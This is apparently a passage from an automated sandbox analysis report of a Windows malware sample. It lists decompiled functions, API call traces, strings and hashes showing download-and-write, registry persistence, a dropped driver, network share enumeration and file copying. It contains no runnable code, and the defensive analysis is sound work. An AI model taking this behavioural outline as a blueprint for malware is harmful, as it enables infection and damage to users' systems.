                                  control_flow_graph 1271 22ffa87-22ffb14 Sleep 1272 22ffb2e-22ffb62 call 22fa201 1271->1272 1273 22ffb16-22ffb2b 1271->1273 1279 22ffb64-22ffb7b 1272->1279 1280 22ffb80-22ffbaa FindFirstFileA 1272->1280 1273->1272 1281 22ffe94-22ffea4 1279->1281 1283 22ffe58-22ffe78 1280->1283 1284 22ffbb0-22ffbc3 FindNextFileA 1280->1284 1289 22ffe7a-22ffe81 FindClose 1283->1289 1290 22ffe87-22ffe92 Sleep 1283->1290 1284->1283 1285 22ffbc9-22ffbd0 1284->1285 1287 22ffbfc-22ffc14 1285->1287 1288 22ffbd2-22ffbf5 1285->1288 1292 22ffc27-22ffc6e 1287->1292 1293 22ffc16-22ffc25 1287->1293 1288->1287 1289->1290 1290->1281 1298 22ffd65-22ffd78 1292->1298 1299 22ffc74-22ffc89 1292->1299 1293->1284 1300 22ffd7e-22ffd88 1298->1300 1301 22ffe44-22ffe53 1298->1301 1304 22ffc8b-22ffca1 1299->1304 1305 22ffca3-22ffcae call 22fb79d 1299->1305 1300->1301 1302 22ffd8e-22ffddf 1300->1302 1301->1284 1314 22ffe27-22ffe41 1302->1314 1315 22ffde1-22ffdf7 1302->1315 1304->1305 1311 22ffcb1-22ffcc7 1304->1311 1305->1311 1316 22ffcc9-22ffcdf 1311->1316 1317 22ffce5-22ffcec 1311->1317 1314->1301 1315->1314 1325 22ffdf9-22ffe0d 1315->1325 1316->1298 1316->1317 1318 22ffcf7-22ffd06 1317->1318 1319 22ffd38-22ffd45 call 22fcac1 1318->1319 1320 22ffd08-22ffd24 call 22fa201 1318->1320 1330 22ffd48-22ffd5e 1319->1330 1328 22ffd36 1320->1328 1329 22ffd26-22ffd34 call 22fb79d 1320->1329 1325->1314 1334 22ffe0f-22ffe1f call 22ffa87 1325->1334 1328->1318 1329->1330 1330->1298 1337 22ffe24 1334->1337 1337->1314
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Find$FileSleep$CloseFirstNext
                                  • String ID: P$c:\windows
                                  • API String ID: 2763178097-2351311205
                                  • Opcode ID: c047d3c1a8fb74fb9d68208ae84786d014997aac57a902be1c99a03e7330c710
                                  • Instruction ID: 736e2666bd7a7fbf79d5f4f1cef738f23ebd55105febc9c0dbe685100b606e67
                                  • Opcode Fuzzy Hash: c047d3c1a8fb74fb9d68208ae84786d014997aac57a902be1c99a03e7330c710
                                  • Instruction Fuzzy Hash: B0C1BEB1A50209ABCB14CFA8DD94BAF77B9EF48308F048568FA09DB285D734D961CF54
                                  Function 022FF805 Relevance: 12.2, APIs: 8, Instructions: 158networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1338 22ff805-22ff8c9 call 22fbb7e 1343 22ff8cf-22ff8d6 1338->1343 1344 22ffa7c-22ffa86 1338->1344 1343->1344 1345 22ff8dc-22ff8e3 1343->1345 1345->1344 1346 22ff8e9-22ff8f0 1345->1346 1346->1344 1347 22ff8f6-22ff918 InternetOpenA 1346->1347 1348 22ff91e-22ff94a InternetOpenUrlA 1347->1348 1349 22ffa50-22ffa57 1347->1349 1348->1349 1350 22ff950-22ff954 1348->1350 1351 22ffa59-22ffa60 InternetCloseHandle 1349->1351 1352 22ffa66-22ffa6d 1349->1352 1353 22ff978-22ff99a InternetReadFile 1350->1353 1354 22ff956-22ff972 CreateFileA 1350->1354 1351->1352 1352->1344 1355 22ffa6f-22ffa76 InternetCloseHandle 1352->1355 1356 22ffa36-22ffa3d 1353->1356 1357 22ff9a0-22ff9a7 1353->1357 1354->1353 1355->1344 1356->1353 1358 22ffa43-22ffa4a FindCloseChangeNotification 1356->1358 1357->1356 1359 22ff9ad-22ff9b1 1357->1359 1358->1349 1360 22ff9b3-22ff9ba 1359->1360 1361 22ff9e0-22ff9e4 1359->1361 1360->1361 1362 22ff9bc-22ff9da WriteFile 1360->1362 1363 22ff9e6-22ff9ef 1361->1363 1364 22ffa24-22ffa30 1361->1364 1362->1361 1365 22ffa02 1363->1365 1366 22ff9f1-22ffa00 1363->1366 1364->1356 1365->1358 1366->1365 1367 22ffa04-22ffa21 call 2306e8b 1366->1367 1367->1364
                                  APIs
                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 022FF905
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 022FF937
                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 022FF96C
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 022FF992
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 022FF9DA
                                  • FindCloseChangeNotification.KERNEL32(?), ref: 022FFA4A
                                  • InternetCloseHandle.WININET(?), ref: 022FFA60
                                  • InternetCloseHandle.WININET(?), ref: 022FFA76
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Internet$CloseFile$HandleOpen$ChangeCreateFindNotificationReadWrite
                                  • String ID:
                                  • API String ID: 2209595824-0
                                  • Opcode ID: c832760ac960677d959a5c8f765e5f6df1a1a647925e3251d7e1e0bd81497286
                                  • Instruction ID: 28a81ef1b1079e88ee5b9dbedcac9524cc0da7eee8143dfd31f038e698297ff0
                                  • Opcode Fuzzy Hash: c832760ac960677d959a5c8f765e5f6df1a1a647925e3251d7e1e0bd81497286
                                  • Instruction Fuzzy Hash: 5661A1B194061CEBDB70CB54CD58FEAB779AB48305F0046E5E609A62D4CBB85BD4CFA0
                                  Function 022F3846 Relevance: 6.1, APIs: 4, Instructions: 125networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(00000002,00000002,00000000), ref: 022F3925
                                  • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 022F3963
                                  • bind.WS2_32(?,00000002,00000010), ref: 022F3979
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: bindsetsockoptsocket
                                  • String ID:
                                  • API String ID: 3947658864-0
                                  • Opcode ID: 05a0dfd5ce68345f107cbe523542eec6c55c2854c72340c84678938593f721a0
                                  • Instruction ID: fdd97f840ddb64d4e32408b53753f50f7e55d7b91d7ffe2e261ca76091f5c89b
                                  • Opcode Fuzzy Hash: 05a0dfd5ce68345f107cbe523542eec6c55c2854c72340c84678938593f721a0
                                  • Instruction Fuzzy Hash: 61511BB4D503A8DBEB20CB55CD49BD9B7B8AF08701F0085E9E799A6284D7F40AC4CF24
                                  Function 022FB81A Relevance: 4.6, APIs: 3, Instructions: 142filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,00000000), ref: 022FB928
                                  • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 022FB94F
                                  • Sleep.KERNEL32(00000100), ref: 022FBA18
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileFind$FirstNextSleep
                                  • String ID:
                                  • API String ID: 2635277345-0
                                  • Opcode ID: 7c4d2136387a59b207afb2ead6dba3ad2881a810988d9194a89585c6dbdf7a59
                                  • Instruction ID: ca83228d5cf48f06ffb3b096bfe6a58aa02d0c3191484b560b56136eeaf99796
                                  • Opcode Fuzzy Hash: 7c4d2136387a59b207afb2ead6dba3ad2881a810988d9194a89585c6dbdf7a59
                                  • Instruction Fuzzy Hash: 3C5183B1D502289BDB64CBA0DC48BEFB77DAB48309F0049F8EA0DA6144DB749B95CF50
                                  Function 00403B80 Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 181synchronizationregistryfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\NVIDIA Corporation\Installer,00000000,00000001,?), ref: 00403BAD
                                  • RegQueryValueExA.ADVAPI32 ref: 00403BE5
                                  • _memset.LIBCMT ref: 00403BF8
                                  • RegQueryValueExA.ADVAPI32(?,LogPath,00000000,00000000,?,?), ref: 00403C25
                                  • PathIsRelativeA.SHLWAPI(?), ref: 00403C30
                                  • RegCloseKey.ADVAPI32(?), ref: 00403C53
                                  • CreateMutexA.KERNEL32(00000000,00000000,Global\NVInstallerLogFile), ref: 00403C73
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403C89
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000008,NVInstallerLogSharedMemory), ref: 00403C9C
                                  • ReleaseMutex.KERNEL32(?), ref: 00403CB1
                                  • CloseHandle.KERNEL32(?), ref: 00403CBE
                                  • GetLastError.KERNEL32 ref: 00403CE2
                                  • MapViewOfFile.KERNEL32(00000000,?,00000006,00000000,00000000,00000000), ref: 00403CFE
                                  • CloseHandle.KERNEL32(?), ref: 00403D19
                                  • ReleaseMutex.KERNEL32(?), ref: 00403D28
                                  • CloseHandle.KERNEL32(?), ref: 00403D35
                                  • GetFileAttributesA.KERNEL32(?), ref: 00403D65
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00403D76
                                  • _sprintf.LIBCMT ref: 00403D8B
                                  • ReleaseMutex.KERNEL32(?,?,?,?,?,?), ref: 00403DC5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseMutex$CreateFileHandleRelease$QueryValue$AttributesDirectoryErrorLastMappingObjectOpenPathRelativeSingleViewWait_memset_sprintf
                                  • String ID: %s\NVInstaller.log$C:\Temp$Global\NVInstallerLogFile$LogPath$Logging$NVInstallerLogSharedMemory$SOFTWARE\NVIDIA Corporation\Installer
                                  • API String ID: 2627255047-2578820818
                                  • Opcode ID: 052d10b7ba0bcf3eb9074f92dd681132ef49649650334ca512f47e5b3b60c8f1
                                  • Instruction ID: e88f1dd91a3dfb04777037b14920d96b08079ed927c04f7df4dc91cae3044eae
                                  • Opcode Fuzzy Hash: 052d10b7ba0bcf3eb9074f92dd681132ef49649650334ca512f47e5b3b60c8f1
                                  • Instruction Fuzzy Hash: F551DEB1604305AFD324DF64ECC5AAB7BA8FB88305F40893EF555D3290E7788944CB9A
                                  Function 02302847 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 336registrylibraryprocessCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 898 2302847-2302906 call 23078a0 call 2301d03 WinExec LoadLibraryA 903 2302952-230296c LoadLibraryA 898->903 904 2302908-230294d 898->904 905 23029d1-23029f3 RegOpenKeyExA 903->905 906 230296e-23029cc 903->906 904->903 907 23029f5-2302a27 RegSetValueExA RegCloseKey 905->907 908 2302a2d-2302a4f RegOpenKeyExA 905->908 906->905 907->908 911 2302a51-2302a82 RegSetValueExA 908->911 912 2302a89-2302aab RegOpenKeyExA 908->912 911->912 913 2302b19-2302b47 GetComputerNameA 912->913 914 2302aad-2302b12 912->914 921 2302b94-2302bd2 CreateFileMappingA call 22f1320 call 22f1b6e 913->921 922 2302b49-2302b8e 913->922 914->913 933 2302bd4 call 22fba5a 921->933 934 2302bd9-2302c0f 921->934 922->921 933->934 936 2302c10-2302c20 934->936 937 2302c26-2302c36 936->937 938 2302cea-2302d23 936->938 937->938 939 2302c3c-2302c4b 937->939 948 2302d35-2302de5 CharLowerA GlobalAlloc 938->948 949 2302d25-2302d2a 938->949 939->938 941 2302c51-2302c87 939->941 942 2302c97 941->942 943 2302c89-2302c95 941->943 944 2302ca1-2302ce1 942->944 943->944 952 2302ce3 944->952 953 2302ce5 944->953 949->948 952->938 953->936
                                  APIs
                                    • Part of subcall function 02301D03: RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?,?), ref: 02301D4A
                                    • Part of subcall function 02301D03: RegSetValueExA.KERNELBASE(?,?,00000000,00000004,00000002,00000004), ref: 02301D78
                                    • Part of subcall function 02301D03: RegCloseKey.KERNEL32(?), ref: 02301D85
                                  • WinExec.KERNEL32(02317F84,00000000), ref: 023028E7
                                  • LoadLibraryA.KERNEL32(?), ref: 023028F3
                                  • LoadLibraryA.KERNEL32(?), ref: 02302959
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,00000000), ref: 023029EB
                                  • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000000,00000004), ref: 02302A1A
                                  • RegCloseKey.KERNEL32(00000000), ref: 02302A27
                                  • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,00000000), ref: 02302A47
                                  • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000000,00000004), ref: 02302A76
                                  • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,00000000), ref: 02302AA3
                                  • GetComputerNameA.KERNEL32(00000000,00000080), ref: 02302B31
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,?), ref: 02302BA8
                                  • CharLowerA.USER32(c:\windows), ref: 02302D6E
                                  • GlobalAlloc.KERNEL32(00000040,00019000), ref: 02302D7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Open$Value$CloseLibraryLoad$AllocCharComputerCreateExecFileGlobalLowerMappingName
                                  • String ID: C:\Windows\system32\drivers\ptqmrn.sys$c:\windows$h*U$n
                                  • API String ID: 4234863482-1818592721
                                  • Opcode ID: ce8bedf69c6d79cffff6174ab2bc76772418de1d260f3e5d88db73e89f412a54
                                  • Instruction ID: fa00c878bc34a6a06bd11f2452ddf3adb6a22183e248bc01ec38241349ebda88
                                  • Opcode Fuzzy Hash: ce8bedf69c6d79cffff6174ab2bc76772418de1d260f3e5d88db73e89f412a54
                                  • Instruction Fuzzy Hash: 66E1C5F1E80618AFD724CFA4DCA8FAB77B9FB08701F004599EB0996280D7745A95CF64
                                  Function 02302DE6 Relevance: 18.2, APIs: 12, Instructions: 166threadsleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • SetErrorMode.KERNEL32(00008002), ref: 02302E18
                                    • Part of subcall function 02302847: WinExec.KERNEL32(02317F84,00000000), ref: 023028E7
                                    • Part of subcall function 02302847: LoadLibraryA.KERNEL32(?), ref: 023028F3
                                    • Part of subcall function 02302847: LoadLibraryA.KERNEL32(?), ref: 02302959
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001161B,00000000,00000000,00000000), ref: 02302E46
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B3F5,00000000,00000000,00000000), ref: 02302E67
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02302E6E
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00012633,00000000,00000000,00000000), ref: 02302E88
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00003F98,00000000,00000000,00000000), ref: 02302EA9
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02302EB0
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B81A,00000000,00000000,00000000), ref: 02302ECA
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02302ED1
                                    • Part of subcall function 02303090: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,022F21E7), ref: 023030C7
                                    • Part of subcall function 02303090: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,022F21E7), ref: 023030EE
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00003846,00000000,00000000,00000000,00000001), ref: 02303028
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00003D56,00000000,00000000,00000000), ref: 02303049
                                  • Sleep.KERNEL32(00000200), ref: 02303064
                                    • Part of subcall function 022FBD79: MapViewOfFile.KERNEL32(00000280,00000006,00000000,00000000,00015400,?,00000000), ref: 022FBDD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Create$Thread$ChangeCloseFileFindNotification$LibraryLoadView$ErrorExecMappingModeSleep
                                  • String ID:
                                  • API String ID: 1062100891-0
                                  • Opcode ID: 74b7a0e2e285d37b40128357bfdb052976bf1f6c4eb6326a8020fdd028bc9068
                                  • Instruction ID: f154d55d4253f40a071c409fb9af36d9e97cd3dada34d0e28aef6165673083df
                                  • Opcode Fuzzy Hash: 74b7a0e2e285d37b40128357bfdb052976bf1f6c4eb6326a8020fdd028bc9068
                                  • Instruction Fuzzy Hash: D1615170A84368ABFB64DB50CC59FDAB778AF04B01F1045E4FB0A661D0DBB02A84CF65
                                  Function 022FFEA5 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 244filememoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1083 22ffea5-22fff66 CreateFileA 1084 22fff68-22fff7f 1083->1084 1085 22fff84-22fffbb GlobalAlloc ReadFile 1083->1085 1086 2300270-2300280 1084->1086 1087 22fffbd-22ffff7 call 22f10e5 call 22f11be 1085->1087 1088 22ffff9-22ffffd 1085->1088 1090 230006c-23000d5 SetFilePointer WriteFile SetFilePointer SetEndOfFile FindCloseChangeNotification 1087->1090 1089 22fffff-2300009 1088->1089 1088->1090 1094 230001d-2300026 1089->1094 1092 23000e3-23000e7 1090->1092 1093 23000d7-23000e1 1090->1093 1097 23000f3-2300114 DeleteFileA 1092->1097 1098 23000e9-23000ec 1092->1098 1093->1092 1096 2300119-230011d 1093->1096 1094->1090 1099 2300028-230006a call 22f10e5 call 22f11be 1094->1099 1101 2300129-230019e 1096->1101 1102 230011f-2300122 1096->1102 1097->1086 1098->1097 1099->1094 1112 23001af-23001b6 1101->1112 1102->1101 1114 23001b8-23001c9 1112->1114 1115 23001dd-230026a 1112->1115 1116 23001db 1114->1116 1117 23001cb-23001d9 1114->1117 1115->1086 1116->1112 1117->1115
                                  APIs
                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?), ref: 022FFF53
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 022FFF90
                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 022FFFB1
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 02300079
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02300097
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 023000AC
                                  • SetEndOfFile.KERNEL32(?), ref: 023000B9
                                  • FindCloseChangeNotification.KERNEL32(?), ref: 023000C6
                                  • DeleteFileA.KERNEL32(?), ref: 023000F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$Pointer$AllocChangeCloseCreateDeleteFindGlobalNotificationReadWrite
                                  • String ID: D
                                  • API String ID: 4141462786-2746444292
                                  • Opcode ID: 0df20139784f773de0242d9eb8725906afbc42f215a0c3a4c378b6aba2f0f360
                                  • Instruction ID: 2374ad935ac1ca0110dfefed8334fd84d9536875fb05659859ae728d54486b71
                                  • Opcode Fuzzy Hash: 0df20139784f773de0242d9eb8725906afbc42f215a0c3a4c378b6aba2f0f360
                                  • Instruction Fuzzy Hash: ADB162B1D44218EFDB24DFA4DC9CBEEB779EB48310F108698E609A7280C7759A85CF50
                                  Function 02302633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 133threadsleeplibraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1125 2302633-230266d call 23078a0 1128 230266e-2302675 1125->1128 1129 2302684-23026b1 LoadLibraryA 1128->1129 1130 2302677-2302682 Sleep 1128->1130 1132 23026b3-23026c6 GetProcAddress 1129->1132 1133 23026cb-23026d2 1129->1133 1130->1128 1132->1133 1134 23026d4-230270e 1133->1134 1135 2302728-230277f CreateThread * 2 1133->1135 1134->1135 1142 2302710-2302723 1134->1142 1143 230279b-23027a2 1135->1143 1142->1135 1144 23027a4-23027ca Sleep CreateThread FindCloseChangeNotification 1143->1144 1145 23027cc-23027f8 call 2300640 * 2 1143->1145 1144->1143 1153 2302836-2302844 1145->1153 1154 23027fa-2302801 1145->1154 1154->1153 1155 2302803-230280a 1154->1155 1155->1153 1156 230280c-2302833 call 22f1000 call 2300992 1155->1156 1156->1153
                                  APIs
                                  • Sleep.KERNEL32(00000400), ref: 0230267C
                                    • Part of subcall function 02300992: WNetOpenEnumA.MPR(00000002,00000000,00000000,02308028,00000000), ref: 02300A02
                                  • LoadLibraryA.KERNEL32(00000000), ref: 0230269E
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 023026C0
                                  • CreateThread.KERNEL32(00000000,00000000,02301E7C,00000000,00000000,00000000), ref: 0230273C
                                  • CreateThread.KERNEL32(00000000,00000000,02300D09,00000000,00000000,00000000), ref: 0230275D
                                  • Sleep.KERNEL32(00000400), ref: 02302795
                                  • CreateThread.KERNEL32(00000000,00000000,02300B90,0000005A,00000000,00000000), ref: 023027BD
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 023027C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CreateThread$Sleep$AddressChangeCloseEnumFindLibraryLoadNotificationOpenProc
                                  • String ID: Z
                                  • API String ID: 3340677522-1505515367
                                  • Opcode ID: 24d34da96f2fd3571734e1635218910057c272550c80287b9e8bb9eac50ef5bf
                                  • Instruction ID: 325d7cd75e87de65d8ae58ff11be97a2a7066b02bf91ac3d6af854c97b2fe4fa
                                  • Opcode Fuzzy Hash: 24d34da96f2fd3571734e1635218910057c272550c80287b9e8bb9eac50ef5bf
                                  • Instruction Fuzzy Hash: D6518CB5D80264ABE725DB60DC98FDA7778BB08706F0049A9FB4AA61C0D7B019D4CF24
                                  Function 02301E7C Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 473filesleepthreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1162 2301e7c-2301fac call 23078a0 call 22f12c4 Sleep call 22fbc61 call 22f621e 1171 2301fb2-2301fdb CreateFileA 1162->1171 1172 23025fd-2302630 RtlExitUserThread 1162->1172 1173 230200c-2302024 CopyFileA 1171->1173 1174 2301fdd-2302006 FindCloseChangeNotification 1171->1174 1173->1172 1176 230202a-230203a call 22fcac1 1173->1176 1174->1173 1179 230203f-2302044 1176->1179 1179->1172 1180 230204a-2302054 1179->1180 1180->1172 1181 230205a-2302064 1180->1181 1181->1172 1182 230206a-2302076 1181->1182 1182->1172 1183 230207c-2302089 1182->1183 1183->1172 1184 230208f-2302096 1183->1184 1184->1172 1185 230209c-23020d9 call 2301d03 1184->1185 1190 23025ed-23025f8 1185->1190 1191 23020df-23020fd 1185->1191 1190->1184 1192 2302103-2302141 1191->1192 1193 23025e8 1191->1193 1196 2302162-230219f 1192->1196 1197 2302143-230214a 1192->1197 1193->1190 1202 23021a5-23021dd 1196->1202 1203 23023c8-23023d8 1196->1203 1197->1196 1198 230214c-2302153 1197->1198 1198->1196 1199 2302155-230215c 1198->1199 1199->1193 1199->1196 1210 23021e3-23021ff 1202->1210 1211 23023bb-23023c1 1202->1211 1206 23023f6-230241f 1203->1206 1207 23023da-23023ef 1203->1207 1206->1193 1214 2302425-23024ab call 22fb69a call 22f12c4 1206->1214 1207->1206 1210->1211 1213 2302205-230225a call 22f1000 1210->1213 1211->1203 1226 2302260-230227d call 22fa201 1213->1226 1227 23023b6 1213->1227 1228 23024c1-23024d6 call 22f12c4 1214->1228 1229 23024ad-23024bf 1214->1229 1226->1227 1235 2302283-2302296 1226->1235 1227->1211 1237 23024d8-23024ea 1228->1237 1238 23024ec-23024f7 1228->1238 1236 23024fe-23025a6 call 23019d5 1229->1236 1235->1227 1241 230229c-23022a5 1235->1241 1236->1193 1264 23025a8-23025e1 1236->1264 1237->1236 1238->1236 1244 23023b1 1241->1244 1245 23022ab-23022bd 1241->1245 1244->1227 1246 23022c8-23022cb 1245->1246 1247 23022bf-23022c5 1245->1247 1249 23022d1-23022dd 1246->1249 1247->1246 1250 230230b-2302335 1249->1250 1251 23022df-23022eb 1249->1251 1259 2302337-230236d 1250->1259 1260 23023af 1250->1260 1251->1250 1253 23022ed-23022f8 1251->1253 1253->1250 1254 23022fa-2302309 1253->1254 1254->1249 1259->1260 1266 230236f-23023a8 1259->1266 1260->1227 1264->1193 1266->1260
                                  APIs
                                  • Sleep.KERNEL32 ref: 02301F86
                                    • Part of subcall function 022F621E: GetFileAttributesA.KERNEL32(?), ref: 022F635B
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02301FC8
                                  • FindCloseChangeNotification.KERNEL32(000000FF), ref: 02302006
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 0230201C
                                  • RtlExitUserThread.NTDLL(00000000), ref: 02302618
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$AttributesChangeCloseCopyCreateExitFindNotificationSleepThreadUser
                                  • String ID: :$\
                                  • API String ID: 1445743944-1166558509
                                  • Opcode ID: 4aca2f93c926d20e5e9d0242b1f4d1d08f2c2cde66ed81bd3da2e3113ddb5457
                                  • Instruction ID: 3cc8c8bcf95fc12bad2fed43673279ec4622f3c82fbc965ed131e021edf4b058
